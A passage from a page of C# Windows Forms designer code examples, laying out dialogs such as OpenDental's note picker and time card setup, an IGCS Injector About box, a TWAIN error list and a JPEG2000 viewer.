     this.SuspendLayout();
     //
     // butOK
     //
     this.butOK.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butOK.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butOK.Autosize = true;
     this.butOK.BtnShape = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butOK.BtnStyle = OpenDental.UI.enumType.XPStyle.Silver;
     this.butOK.Location = new System.Drawing.Point(473, 516);
     this.butOK.Name     = "butOK";
     this.butOK.Size     = new System.Drawing.Size(75, 26);
     this.butOK.TabIndex = 1;
     this.butOK.Text     = "&OK";
     this.butOK.Click   += new System.EventHandler(this.butOK_Click);
     //
     // gridMain
     //
     this.gridMain.HScrollVisible   = false;
     this.gridMain.Location         = new System.Drawing.Point(29, 40);
     this.gridMain.Name             = "gridMain";
     this.gridMain.ScrollValue      = 0;
     this.gridMain.SelectionMode    = System.Windows.Forms.SelectionMode.MultiExtended;
     this.gridMain.Size             = new System.Drawing.Size(627, 322);
     this.gridMain.TabIndex         = 2;
     this.gridMain.Title            = "Pick Note";
     this.gridMain.TranslationName  = "TableNotePick";
     this.gridMain.CellClick       += new OpenDental.UI.ODGridClickEventHandler(this.gridMain_CellClick);
     this.gridMain.CellDoubleClick += new OpenDental.UI.ODGridClickEventHandler(this.gridMain_CellDoubleClick);
     //
     // label1
     //
     this.label1.Location = new System.Drawing.Point(29, 2);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(627, 35);
     this.label1.TabIndex = 3;
     this.label1.Text     = "Multiple versions of the note exist.  Please pick or edit one version to retain. " +
                            " This note will apply to ALL similar plans.  You can also pick multiple rows to " +
                            "combine notes.";
     this.label1.TextAlign = System.Drawing.ContentAlignment.BottomLeft;
     //
     // textNote
     //
     this.textNote.Location  = new System.Drawing.Point(29, 396);
     this.textNote.Multiline = true;
     this.textNote.Name      = "textNote";
     this.textNote.Size      = new System.Drawing.Size(627, 99);
     this.textNote.TabIndex  = 4;
     //
     // label2
     //
     this.label2.Location  = new System.Drawing.Point(29, 365);
     this.label2.Name      = "label2";
     this.label2.Size      = new System.Drawing.Size(627, 28);
     this.label2.TabIndex  = 5;
     this.label2.Text      = "This is the final note that will be saved for all similar plans.";
     this.label2.TextAlign = System.Drawing.ContentAlignment.BottomLeft;
     //
     // butCancel
     //
     this.butCancel.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butCancel.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butCancel.Autosize = true;
     this.butCancel.BtnShape = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butCancel.BtnStyle = OpenDental.UI.enumType.XPStyle.Silver;
     this.butCancel.Location = new System.Drawing.Point(581, 516);
     this.butCancel.Name     = "butCancel";
     this.butCancel.Size     = new System.Drawing.Size(75, 26);
     this.butCancel.TabIndex = 6;
     this.butCancel.Text     = "&Cancel";
     this.butCancel.Click   += new System.EventHandler(this.butCancel_Click);
     //
     // FormNotePick
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.ClientSize        = new System.Drawing.Size(692, 564);
     this.Controls.Add(this.butCancel);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.textNote);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.gridMain);
     this.Controls.Add(this.butOK);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.Name          = "FormNotePick";
     this.ShowInTaskbar = false;
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Load         += new System.EventHandler(this.FormNotePick_Load);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #57
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(About));
     this._okButton          = new System.Windows.Forms.Button();
     this.groupBox1          = new System.Windows.Forms.GroupBox();
     this.linkLabel1         = new System.Windows.Forms.LinkLabel();
     this.label1             = new System.Windows.Forms.Label();
     this.label2             = new System.Windows.Forms.Label();
     this.label4             = new System.Windows.Forms.Label();
     this._animTimer         = new System.Windows.Forms.Timer(this.components);
     this._creditsPictureBox = new System.Windows.Forms.PictureBox();
     this._logoPictureBox    = new System.Windows.Forms.PictureBox();
     this.groupBox1.SuspendLayout();
     ((System.ComponentModel.ISupportInitialize)(this._creditsPictureBox)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this._logoPictureBox)).BeginInit();
     this.SuspendLayout();
     //
     // _okButton
     //
     this._okButton.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this._okButton.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this._okButton.Location     = new System.Drawing.Point(360, 365);
     this._okButton.Name         = "_okButton";
     this._okButton.Size         = new System.Drawing.Size(72, 23);
     this._okButton.TabIndex     = 0;
     this._okButton.Text         = "OK";
     this._okButton.Click       += new System.EventHandler(this._okButton_Click);
     //
     // groupBox1
     //
     this.groupBox1.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)
                                                                   | System.Windows.Forms.AnchorStyles.Right)));
     this.groupBox1.Controls.Add(this.linkLabel1);
     this.groupBox1.Controls.Add(this.label1);
     this.groupBox1.Controls.Add(this.label2);
     this.groupBox1.Location = new System.Drawing.Point(11, 227);
     this.groupBox1.Name     = "groupBox1";
     this.groupBox1.Size     = new System.Drawing.Size(427, 83);
     this.groupBox1.TabIndex = 2;
     this.groupBox1.TabStop  = false;
     this.groupBox1.Text     = "Application information";
     //
     // linkLabel1
     //
     this.linkLabel1.FlatStyle    = System.Windows.Forms.FlatStyle.System;
     this.linkLabel1.Location     = new System.Drawing.Point(54, 57);
     this.linkLabel1.Name         = "linkLabel1";
     this.linkLabel1.Size         = new System.Drawing.Size(318, 19);
     this.linkLabel1.TabIndex     = 4;
     this.linkLabel1.TabStop      = true;
     this.linkLabel1.Text         = "https://github.com/FransBouma/InjectableGenericCameraSystem";
     this.linkLabel1.LinkClicked += new System.Windows.Forms.LinkLabelLinkClickedEventHandler(this.linkLabel1_LinkClicked);
     //
     // label1
     //
     this.label1.AutoSize = true;
     this.label1.Location = new System.Drawing.Point(136, 16);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(155, 13);
     this.label1.TabIndex = 0;
     this.label1.Text     = "IGCS Injector is ©2019 Otis_Inf";
     //
     // label2
     //
     this.label2.Location = new System.Drawing.Point(166, 33);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(95, 18);
     this.label2.TabIndex = 0;
     this.label2.Text     = "All rights reserved.";
     //
     // label4
     //
     this.label4.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.label4.Location = new System.Drawing.Point(9, 323);
     this.label4.Name     = "label4";
     this.label4.Size     = new System.Drawing.Size(303, 66);
     this.label4.TabIndex = 3;
     this.label4.Text     = resources.GetString("label4.Text");
     //
     // _animTimer
     //
     this._animTimer.Enabled  = true;
     this._animTimer.Interval = 20;
     this._animTimer.Tick    += new System.EventHandler(this._animTimer_Tick);
     //
     // _creditsPictureBox
     //
     this._creditsPictureBox.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this._creditsPictureBox.Image        = ((System.Drawing.Image)(resources.GetObject("_creditsPictureBox.Image")));
     this._creditsPictureBox.InitialImage = null;
     this._creditsPictureBox.Location     = new System.Drawing.Point(345, 324);
     this._creditsPictureBox.Name         = "_creditsPictureBox";
     this._creditsPictureBox.Size         = new System.Drawing.Size(74, 35);
     this._creditsPictureBox.TabIndex     = 4;
     this._creditsPictureBox.TabStop      = false;
     this._creditsPictureBox.Visible      = false;
     //
     // _logoPictureBox
     //
     this._logoPictureBox.BackColor    = System.Drawing.Color.White;
     this._logoPictureBox.Dock         = System.Windows.Forms.DockStyle.Top;
     this._logoPictureBox.Image        = global::IGCSInjectorUI.MainResources.IGCS_SplashScreen;
     this._logoPictureBox.InitialImage = null;
     this._logoPictureBox.Location     = new System.Drawing.Point(0, 0);
     this._logoPictureBox.Name         = "_logoPictureBox";
     this._logoPictureBox.Size         = new System.Drawing.Size(450, 217);
     this._logoPictureBox.TabIndex     = 0;
     this._logoPictureBox.TabStop      = false;
     //
     // About
     //
     this.AcceptButton        = this._okButton;
     this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.ClientSize          = new System.Drawing.Size(450, 398);
     this.Controls.Add(this._creditsPictureBox);
     this.Controls.Add(this.label4);
     this.Controls.Add(this.groupBox1);
     this.Controls.Add(this._okButton);
     this.Controls.Add(this._logoPictureBox);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedToolWindow;
     this.Icon            = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Name            = "About";
     this.StartPosition   = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text            = "About IGCS Injector";
     this.Closing        += new System.ComponentModel.CancelEventHandler(this.About_Closing);
     this.groupBox1.ResumeLayout(false);
     this.groupBox1.PerformLayout();
     ((System.ComponentModel.ISupportInitialize)(this._creditsPictureBox)).EndInit();
     ((System.ComponentModel.ISupportInitialize)(this._logoPictureBox)).EndInit();
     this.ResumeLayout(false);
 }
Example #58
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormTimeCardSetup));
     this.checkUseDecimal    = new System.Windows.Forms.CheckBox();
     this.groupBox1          = new System.Windows.Forms.GroupBox();
     this.checkShowSeconds   = new System.Windows.Forms.CheckBox();
     this.checkAdjOverBreaks = new System.Windows.Forms.CheckBox();
     this.butAddRule         = new OpenDental.UI.Button();
     this.gridRules          = new OpenDental.UI.ODGrid();
     this.gridMain           = new OpenDental.UI.ODGrid();
     this.butAdd             = new OpenDental.UI.Button();
     this.butClose           = new OpenDental.UI.Button();
     this.label2             = new System.Windows.Forms.Label();
     this.textADPCompanyCode = new System.Windows.Forms.TextBox();
     this.butGenerate        = new OpenDental.UI.Button();
     this.butDelete          = new OpenDental.UI.Button();
     this.checkHideOlder     = new System.Windows.Forms.CheckBox();
     this.butDeleteRules     = new OpenDental.UI.Button();
     this.groupBox1.SuspendLayout();
     this.SuspendLayout();
     //
     // checkUseDecimal
     //
     this.checkUseDecimal.Location = new System.Drawing.Point(12, 19);
     this.checkUseDecimal.Name     = "checkUseDecimal";
     this.checkUseDecimal.Size     = new System.Drawing.Size(362, 18);
     this.checkUseDecimal.TabIndex = 12;
     this.checkUseDecimal.Text     = "Use decimal format rather than colon format";
     this.checkUseDecimal.UseVisualStyleBackColor = true;
     this.checkUseDecimal.Click += new System.EventHandler(this.checkUseDecimal_Click);
     //
     // groupBox1
     //
     this.groupBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.groupBox1.Controls.Add(this.checkShowSeconds);
     this.groupBox1.Controls.Add(this.checkAdjOverBreaks);
     this.groupBox1.Controls.Add(this.checkUseDecimal);
     this.groupBox1.Location = new System.Drawing.Point(305, 584);
     this.groupBox1.Name     = "groupBox1";
     this.groupBox1.Size     = new System.Drawing.Size(380, 74);
     this.groupBox1.TabIndex = 14;
     this.groupBox1.TabStop  = false;
     this.groupBox1.Text     = "Options";
     //
     // checkShowSeconds
     //
     this.checkShowSeconds.Location = new System.Drawing.Point(12, 51);
     this.checkShowSeconds.Name     = "checkShowSeconds";
     this.checkShowSeconds.Size     = new System.Drawing.Size(362, 18);
     this.checkShowSeconds.TabIndex = 14;
     this.checkShowSeconds.Text     = "Use seconds on time card when using colon format";
     this.checkShowSeconds.UseVisualStyleBackColor = true;
     this.checkShowSeconds.Click += new System.EventHandler(this.checkShowSeconds_Click);
     //
     // checkAdjOverBreaks
     //
     this.checkAdjOverBreaks.Location = new System.Drawing.Point(12, 35);
     this.checkAdjOverBreaks.Name     = "checkAdjOverBreaks";
     this.checkAdjOverBreaks.Size     = new System.Drawing.Size(362, 18);
     this.checkAdjOverBreaks.TabIndex = 13;
     this.checkAdjOverBreaks.Text     = "Calc Daily button makes adjustments if breaks over 30 minutes.";
     this.checkAdjOverBreaks.UseVisualStyleBackColor = true;
     this.checkAdjOverBreaks.Click += new System.EventHandler(this.checkAdjOverBreaks_Click);
     //
     // butAddRule
     //
     this.butAddRule.Anchor     = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.butAddRule.Image      = global::OpenDental.Properties.Resources.Add;
     this.butAddRule.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.butAddRule.Location   = new System.Drawing.Point(305, 554);
     this.butAddRule.Name       = "butAddRule";
     this.butAddRule.Size       = new System.Drawing.Size(80, 24);
     this.butAddRule.TabIndex   = 15;
     this.butAddRule.Text       = "Add";
     this.butAddRule.Click     += new System.EventHandler(this.butAddRule_Click);
     //
     // gridRules
     //
     this.gridRules.AllowSortingByColumn = true;
     this.gridRules.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                    | System.Windows.Forms.AnchorStyles.Left)
                                                                   | System.Windows.Forms.AnchorStyles.Right)));
     this.gridRules.Location         = new System.Drawing.Point(305, 27);
     this.gridRules.Name             = "gridRules";
     this.gridRules.SelectionMode    = OpenDental.UI.GridSelectionMode.MultiExtended;
     this.gridRules.Size             = new System.Drawing.Size(687, 523);
     this.gridRules.TabIndex         = 13;
     this.gridRules.Title            = "Rules";
     this.gridRules.TranslationName  = "FormTimeCardSetup";
     this.gridRules.CellDoubleClick += new OpenDental.UI.ODGridClickEventHandler(this.gridRules_CellDoubleClick);
     //
     // gridMain
     //
     this.gridMain.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                  | System.Windows.Forms.AnchorStyles.Left)));
     this.gridMain.Location         = new System.Drawing.Point(19, 27);
     this.gridMain.Name             = "gridMain";
     this.gridMain.SelectionMode    = OpenDental.UI.GridSelectionMode.MultiExtended;
     this.gridMain.Size             = new System.Drawing.Size(272, 523);
     this.gridMain.TabIndex         = 11;
     this.gridMain.Title            = "Pay Periods";
     this.gridMain.TranslationName  = "TablePayPeriods";
     this.gridMain.CellDoubleClick += new OpenDental.UI.ODGridClickEventHandler(this.gridMain_CellDoubleClick);
     //
     // butAdd
     //
     this.butAdd.Anchor     = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.butAdd.Image      = global::OpenDental.Properties.Resources.Add;
     this.butAdd.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.butAdd.Location   = new System.Drawing.Point(19, 554);
     this.butAdd.Name       = "butAdd";
     this.butAdd.Size       = new System.Drawing.Size(88, 24);
     this.butAdd.TabIndex   = 10;
     this.butAdd.Text       = "&Add One";
     this.butAdd.Click     += new System.EventHandler(this.butAdd_Click);
     //
     // butClose
     //
     this.butClose.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butClose.Location = new System.Drawing.Point(917, 664);
     this.butClose.Name     = "butClose";
     this.butClose.Size     = new System.Drawing.Size(75, 24);
     this.butClose.TabIndex = 0;
     this.butClose.Text     = "&Close";
     this.butClose.Click   += new System.EventHandler(this.butClose_Click);
     //
     // label2
     //
     this.label2.Anchor    = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.label2.Location  = new System.Drawing.Point(14, 668);
     this.label2.Name      = "label2";
     this.label2.Size      = new System.Drawing.Size(119, 16);
     this.label2.TabIndex  = 17;
     this.label2.Text      = "ADP Company Code";
     this.label2.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
     //
     // textADPCompanyCode
     //
     this.textADPCompanyCode.Anchor   = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.textADPCompanyCode.Location = new System.Drawing.Point(133, 666);
     this.textADPCompanyCode.Name     = "textADPCompanyCode";
     this.textADPCompanyCode.Size     = new System.Drawing.Size(97, 20);
     this.textADPCompanyCode.TabIndex = 16;
     //
     // butGenerate
     //
     this.butGenerate.Anchor     = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.butGenerate.Image      = global::OpenDental.Properties.Resources.Add;
     this.butGenerate.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.butGenerate.Location   = new System.Drawing.Point(19, 584);
     this.butGenerate.Name       = "butGenerate";
     this.butGenerate.Size       = new System.Drawing.Size(114, 23);
     this.butGenerate.TabIndex   = 18;
     this.butGenerate.Text       = "Generate Many";
     this.butGenerate.UseVisualStyleBackColor = true;
     this.butGenerate.Click += new System.EventHandler(this.butGenerate_Click);
     //
     // butDelete
     //
     this.butDelete.Anchor     = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.butDelete.Image      = global::OpenDental.Properties.Resources.deleteX;
     this.butDelete.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.butDelete.Location   = new System.Drawing.Point(180, 554);
     this.butDelete.Name       = "butDelete";
     this.butDelete.Size       = new System.Drawing.Size(111, 24);
     this.butDelete.TabIndex   = 19;
     this.butDelete.Text       = "Delete Selected";
     this.butDelete.Click     += new System.EventHandler(this.butDelete_Click);
     //
     // checkHideOlder
     //
     this.checkHideOlder.Checked    = true;
     this.checkHideOlder.CheckState = System.Windows.Forms.CheckState.Checked;
     this.checkHideOlder.Location   = new System.Drawing.Point(20, 7);
     this.checkHideOlder.Name       = "checkHideOlder";
     this.checkHideOlder.Size       = new System.Drawing.Size(288, 18);
     this.checkHideOlder.TabIndex   = 20;
     this.checkHideOlder.Text       = "Hide pay periods older than 6 months";
     this.checkHideOlder.UseVisualStyleBackColor = true;
     this.checkHideOlder.CheckedChanged         += new System.EventHandler(this.checkHideOlder_CheckedChanged);
     //
     // butDeleteRules
     //
     this.butDeleteRules.Anchor     = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butDeleteRules.Image      = global::OpenDental.Properties.Resources.deleteX;
     this.butDeleteRules.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.butDeleteRules.Location   = new System.Drawing.Point(881, 556);
     this.butDeleteRules.Name       = "butDeleteRules";
     this.butDeleteRules.Size       = new System.Drawing.Size(111, 24);
     this.butDeleteRules.TabIndex   = 21;
     this.butDeleteRules.Text       = "Delete Selected";
     this.butDeleteRules.Click     += new System.EventHandler(this.butDeleteRules_Click);
     //
     // FormTimeCardSetup
     //
     this.ClientSize = new System.Drawing.Size(1020, 696);
     this.Controls.Add(this.butDeleteRules);
     this.Controls.Add(this.checkHideOlder);
     this.Controls.Add(this.butDelete);
     this.Controls.Add(this.butGenerate);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.textADPCompanyCode);
     this.Controls.Add(this.butAddRule);
     this.Controls.Add(this.groupBox1);
     this.Controls.Add(this.gridRules);
     this.Controls.Add(this.gridMain);
     this.Controls.Add(this.butAdd);
     this.Controls.Add(this.butClose);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.MinimumSize   = new System.Drawing.Size(728, 273);
     this.Name          = "FormTimeCardSetup";
     this.ShowInTaskbar = false;
     this.Text          = "Time Card Setup";
     this.FormClosing  += new System.Windows.Forms.FormClosingEventHandler(this.FormPayPeriods_FormClosing);
     this.Load         += new System.EventHandler(this.FormPayPeriods_Load);
     this.groupBox1.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #59
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent( )
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(ErrorList));
     this._gbErrorList = new System.Windows.Forms.GroupBox();
     this._lstError    = new System.Windows.Forms.ListBox();
     this._btnClear    = new System.Windows.Forms.Button();
     this._btnCancel   = new System.Windows.Forms.Button();
     this._gbErrorList.SuspendLayout();
     this.SuspendLayout();
     //
     // _gbErrorList
     //
     this._gbErrorList.Controls.Add(this._lstError);
     this._gbErrorList.Location = new System.Drawing.Point(8, 8);
     this._gbErrorList.Name     = "_gbErrorList";
     this._gbErrorList.Size     = new System.Drawing.Size(472, 200);
     this._gbErrorList.TabIndex = 0;
     this._gbErrorList.TabStop  = false;
     //
     // _lstError
     //
     this._lstError.Location = new System.Drawing.Point(8, 16);
     this._lstError.Name     = "_lstError";
     this._lstError.Size     = new System.Drawing.Size(456, 173);
     this._lstError.TabIndex = 0;
     //
     // _btnClear
     //
     this._btnClear.Location = new System.Drawing.Point(168, 216);
     this._btnClear.Name     = "_btnClear";
     this._btnClear.Size     = new System.Drawing.Size(75, 23);
     this._btnClear.TabIndex = 1;
     this._btnClear.Text     = "Clear";
     this._btnClear.Click   += new System.EventHandler(this._btnClear_Click);
     //
     // _btnCancel
     //
     this._btnCancel.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this._btnCancel.Location     = new System.Drawing.Point(248, 216);
     this._btnCancel.Name         = "_btnCancel";
     this._btnCancel.Size         = new System.Drawing.Size(75, 23);
     this._btnCancel.TabIndex     = 2;
     this._btnCancel.Text         = "Cancel";
     //
     // ErrorList
     //
     this.AcceptButton      = this._btnClear;
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.CancelButton      = this._btnCancel;
     this.ClientSize        = new System.Drawing.Size(490, 248);
     this.Controls.Add(this._btnCancel);
     this.Controls.Add(this._btnClear);
     this.Controls.Add(this._gbErrorList);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
     this.Icon            = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox     = false;
     this.MinimizeBox     = false;
     this.Name            = "ErrorList";
     this.Text            = "TWAIN Error List";
     this.Load           += new System.EventHandler(this.ErrorList_Load);
     this._gbErrorList.ResumeLayout(false);
     this.ResumeLayout(false);
 }
Example #60
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(J2KViewer));
     this.pictureBox  = new System.Windows.Forms.PictureBox();
     this.lblFileInfo = new System.Windows.Forms.Label();
     this.dlgOpen     = new System.Windows.Forms.OpenFileDialog();
     this.toolStrip1  = new System.Windows.Forms.ToolStrip();
     this.toolStripDropDownButton1 = new System.Windows.Forms.ToolStripDropDownButton();
     this.fileToolStripMenuItem    = new System.Windows.Forms.ToolStripMenuItem();
     this.exitToolStripMenuItem    = new System.Windows.Forms.ToolStripMenuItem();
     this.toolStripDropDownButton2 = new System.Windows.Forms.ToolStripDropDownButton();
     this.FR           = new System.Windows.Forms.ToolStripMenuItem();
     this.HR           = new System.Windows.Forms.ToolStripMenuItem();
     this.QR           = new System.Windows.Forms.ToolStripMenuItem();
     this.statusStrip1 = new System.Windows.Forms.StatusStrip();
     this.InfoLabel    = new System.Windows.Forms.ToolStripStatusLabel();
     this.ER           = new System.Windows.Forms.ToolStripMenuItem();
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox)).BeginInit();
     this.toolStrip1.SuspendLayout();
     this.statusStrip1.SuspendLayout();
     this.SuspendLayout();
     //
     // pictureBox
     //
     this.pictureBox.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                     | System.Windows.Forms.AnchorStyles.Left)
                                                                    | System.Windows.Forms.AnchorStyles.Right)));
     this.pictureBox.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
     this.pictureBox.Location    = new System.Drawing.Point(0, 27);
     this.pictureBox.Name        = "pictureBox";
     this.pictureBox.Size        = new System.Drawing.Size(524, 321);
     this.pictureBox.TabIndex    = 1;
     this.pictureBox.TabStop     = false;
     //
     // lblFileInfo
     //
     this.lblFileInfo.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
                                                                     | System.Windows.Forms.AnchorStyles.Right)));
     this.lblFileInfo.Location = new System.Drawing.Point(76, 9);
     this.lblFileInfo.Name     = "lblFileInfo";
     this.lblFileInfo.Size     = new System.Drawing.Size(448, 16);
     this.lblFileInfo.TabIndex = 3;
     this.lblFileInfo.Text     = "File:";
     //
     // toolStrip1
     //
     this.toolStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.toolStripDropDownButton1,
         this.toolStripDropDownButton2
     });
     this.toolStrip1.Location = new System.Drawing.Point(0, 0);
     this.toolStrip1.Name     = "toolStrip1";
     this.toolStrip1.Size     = new System.Drawing.Size(524, 25);
     this.toolStrip1.TabIndex = 4;
     this.toolStrip1.Text     = "toolStrip1";
     //
     // toolStripDropDownButton1
     //
     this.toolStripDropDownButton1.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text;
     this.toolStripDropDownButton1.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.fileToolStripMenuItem,
         this.exitToolStripMenuItem
     });
     this.toolStripDropDownButton1.Image = ((System.Drawing.Image)(resources.GetObject("toolStripDropDownButton1.Image")));
     this.toolStripDropDownButton1.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.toolStripDropDownButton1.Name        = "toolStripDropDownButton1";
     this.toolStripDropDownButton1.Size        = new System.Drawing.Size(36, 22);
     this.toolStripDropDownButton1.Text        = "&File";
     this.toolStripDropDownButton1.ToolTipText = "Open file";
     //
     // fileToolStripMenuItem
     //
     this.fileToolStripMenuItem.Name   = "fileToolStripMenuItem";
     this.fileToolStripMenuItem.Size   = new System.Drawing.Size(100, 22);
     this.fileToolStripMenuItem.Text   = "&Open";
     this.fileToolStripMenuItem.Click += new System.EventHandler(this.fileToolStripMenuItem_Click);
     //
     // exitToolStripMenuItem
     //
     this.exitToolStripMenuItem.Name   = "exitToolStripMenuItem";
     this.exitToolStripMenuItem.Size   = new System.Drawing.Size(100, 22);
     this.exitToolStripMenuItem.Text   = "E&xit";
     this.exitToolStripMenuItem.Click += new System.EventHandler(this.exitToolStripMenuItem_Click);
     //
     // toolStripDropDownButton2
     //
     this.toolStripDropDownButton2.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text;
     this.toolStripDropDownButton2.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.FR,
         this.HR,
         this.QR,
         this.ER
     });
     this.toolStripDropDownButton2.Image = ((System.Drawing.Image)(resources.GetObject("toolStripDropDownButton2.Image")));
     this.toolStripDropDownButton2.ImageTransparentColor = System.Drawing.Color.Magenta;
     this.toolStripDropDownButton2.Name        = "toolStripDropDownButton2";
     this.toolStripDropDownButton2.Size        = new System.Drawing.Size(70, 22);
     this.toolStripDropDownButton2.Text        = "&Resolution";
     this.toolStripDropDownButton2.ToolTipText = "Change resolution level";
     //
     // FR
     //
     this.FR.Name   = "FR";
     this.FR.Size   = new System.Drawing.Size(165, 22);
     this.FR.Text   = "Full Resolution";
     this.FR.Click += new System.EventHandler(this.FR_Click);
     //
     // HR
     //
     this.HR.Name   = "HR";
     this.HR.Size   = new System.Drawing.Size(165, 22);
     this.HR.Text   = "Half Resolution";
     this.HR.Click += new System.EventHandler(this.HR_Click);
     //
     // QR
     //
     this.QR.Name   = "QR";
     this.QR.Size   = new System.Drawing.Size(165, 22);
     this.QR.Text   = "Quarter Resolution";
     this.QR.Click += new System.EventHandler(this.QR_Click);
     //
     // statusStrip1
     //
     this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
         this.InfoLabel
     });
     this.statusStrip1.Location   = new System.Drawing.Point(0, 351);
     this.statusStrip1.Name       = "statusStrip1";
     this.statusStrip1.Size       = new System.Drawing.Size(524, 22);
     this.statusStrip1.SizingGrip = false;
     this.statusStrip1.TabIndex   = 5;
     this.statusStrip1.Text       = "statusStrip1";
     //
     // InfoLabel
     //
     this.InfoLabel.Name = "InfoLabel";
     this.InfoLabel.Size = new System.Drawing.Size(96, 17);
     this.InfoLabel.Text = "Image Information";
     //
     // ER
     //
     this.ER.Name   = "ER";
     this.ER.Size   = new System.Drawing.Size(165, 22);
     this.ER.Text   = "Eighth Resolution";
